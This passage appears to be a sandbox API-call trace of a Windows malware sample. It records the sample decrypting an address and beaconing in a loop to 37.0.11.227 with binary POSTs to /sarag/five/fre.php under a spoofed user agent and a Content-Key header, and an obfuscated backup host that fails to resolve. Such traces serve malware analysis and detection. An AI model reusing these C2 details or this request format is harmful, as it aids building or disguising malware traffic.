(lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0209.097] GetProcessHeap () returned 0x690000 [0209.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0209.098] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0209.098] GetProcessHeap () returned 0x690000 [0209.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0209.098] socket (af=2, type=1, protocol=6) returned 0x4b8 [0209.098] connect (s=0x4b8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0209.133] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0209.134] GetProcessHeap () returned 0x690000 [0209.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0209.134] GetProcessHeap () returned 0x690000 [0209.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0209.134] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.135] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.135] GetProcessHeap () returned 0x690000 [0209.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0209.135] GetProcessHeap () returned 0x690000 [0209.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.136] GetProcessHeap () returned 0x690000 [0209.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0209.136] GetProcessHeap () returned 0x690000 [0209.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0209.137] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.137] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.138] GetProcessHeap () returned 0x690000 [0209.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0209.138] GetProcessHeap () returned 0x690000 [0209.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.138] send (s=0x4b8, buf=0x6ad508*, len=242, flags=0) returned 242 [0209.138] send (s=0x4b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0209.139] GetProcessHeap () returned 0x690000 [0209.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0209.139] recv (in: s=0x4b8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0209.225] GetProcessHeap () returned 0x690000 [0209.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0209.226] GetProcessHeap () returned 0x690000 [0209.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0209.229] GetProcessHeap () returned 0x690000 [0209.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0209.230] GetProcessHeap () returned 0x690000 [0209.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0209.230] closesocket (s=0x4b8) returned 0 [0209.231] GetProcessHeap () returned 0x690000 [0209.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0209.231] GetProcessHeap () returned 0x690000 [0209.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0209.231] GetProcessHeap () returned 0x690000 [0209.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0209.232] GetProcessHeap () returned 0x690000 [0209.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0209.232] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc74) returned 0x4b8 [0209.234] Sleep (dwMilliseconds=0xea60) [0209.236] GetProcessHeap () returned 0x690000 [0209.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0209.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.239] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.245] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0209.254] GetProcessHeap () returned 0x690000 [0209.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0209.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.255] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0209.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.256] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.257] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.257] GetProcessHeap () returned 0x690000 [0209.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0209.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.259] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0209.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.260] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0209.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.261] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0209.261] GetProcessHeap () returned 0x690000 [0209.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0209.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.262] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.263] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.264] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.269] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.269] GetProcessHeap () returned 0x690000 [0209.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0209.269] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.270] GetProcessHeap () returned 0x690000 [0209.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0209.272] GetProcessHeap () returned 0x690000 [0209.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0209.272] GetProcessHeap () returned 0x690000 [0209.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0209.273] GetProcessHeap () returned 0x690000 [0209.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0209.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0209.311] GetProcessHeap () returned 0x690000 [0209.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0209.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.315] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0209.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.316] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.317] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.317] GetProcessHeap () returned 0x690000 [0209.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0209.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.319] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0209.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.320] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0209.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.321] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0209.321] GetProcessHeap () returned 0x690000 [0209.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0209.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.335] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0209.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.336] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0209.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.337] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0209.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.338] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0209.338] GetProcessHeap () returned 0x690000 [0209.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0209.338] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0209.338] GetProcessHeap () returned 0x690000 [0209.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0209.339] socket (af=2, type=1, protocol=6) returned 0x4bc [0209.340] connect (s=0x4bc, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0209.385] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0209.386] GetProcessHeap () returned 0x690000 [0209.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0209.386] GetProcessHeap () returned 0x690000 [0209.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0209.386] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.390] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.390] GetProcessHeap () returned 0x690000 [0209.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0209.390] GetProcessHeap () returned 0x690000 [0209.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.390] GetProcessHeap () returned 0x690000 [0209.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0209.390] GetProcessHeap () returned 0x690000 [0209.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0209.391] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.392] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.392] GetProcessHeap () returned 0x690000 [0209.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0209.392] GetProcessHeap () returned 0x690000 [0209.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.393] send (s=0x4bc, buf=0x6ab500*, len=242, flags=0) returned 242 [0209.393] send (s=0x4bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0209.393] GetProcessHeap () returned 0x690000 [0209.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0209.394] recv (in: s=0x4bc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0209.483] GetProcessHeap () returned 0x690000 [0209.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0209.484] GetProcessHeap () returned 0x690000 [0209.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0209.485] GetProcessHeap () returned 0x690000 [0209.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0209.488] GetProcessHeap () returned 0x690000 [0209.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0209.488] closesocket (s=0x4bc) returned 0 [0209.490] GetProcessHeap () returned 0x690000 [0209.490] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0209.490] GetProcessHeap () returned 0x690000 [0209.490] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0209.490] GetProcessHeap () returned 0x690000 [0209.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0209.491] GetProcessHeap () returned 0x690000 [0209.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0209.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xeec) returned 0x4bc [0209.494] Sleep (dwMilliseconds=0xea60) [0209.495] GetProcessHeap () returned 0x690000 [0209.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0209.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.496] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.503] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0209.526] GetProcessHeap () returned 0x690000 [0209.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0209.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.527] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0209.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.528] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.529] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.529] GetProcessHeap () returned 0x690000 [0209.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0209.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.532] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0209.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.533] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0209.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.534] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0209.534] GetProcessHeap () returned 0x690000 [0209.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0209.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.535] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.536] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.537] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.583] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.583] GetProcessHeap () returned 0x690000 [0209.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0209.583] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.583] GetProcessHeap () returned 0x690000 [0209.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0209.584] GetProcessHeap () returned 0x690000 [0209.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0209.584] GetProcessHeap () returned 0x690000 [0209.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0209.585] GetProcessHeap () returned 0x690000 [0209.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0209.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.592] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0209.599] GetProcessHeap () returned 0x690000 [0209.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0209.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.602] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0209.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.603] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.604] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.604] GetProcessHeap () returned 0x690000 [0209.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0209.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.606] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0209.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.607] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0209.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.608] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0209.608] GetProcessHeap () returned 0x690000 [0209.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0209.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.610] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0209.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.611] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0209.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.612] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0209.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.614] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0209.614] GetProcessHeap () returned 0x690000 [0209.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0209.614] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0209.614] GetProcessHeap () returned 0x690000 [0209.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0209.614] socket (af=2, type=1, protocol=6) returned 0x4c0 [0209.614] connect (s=0x4c0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0209.639] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), 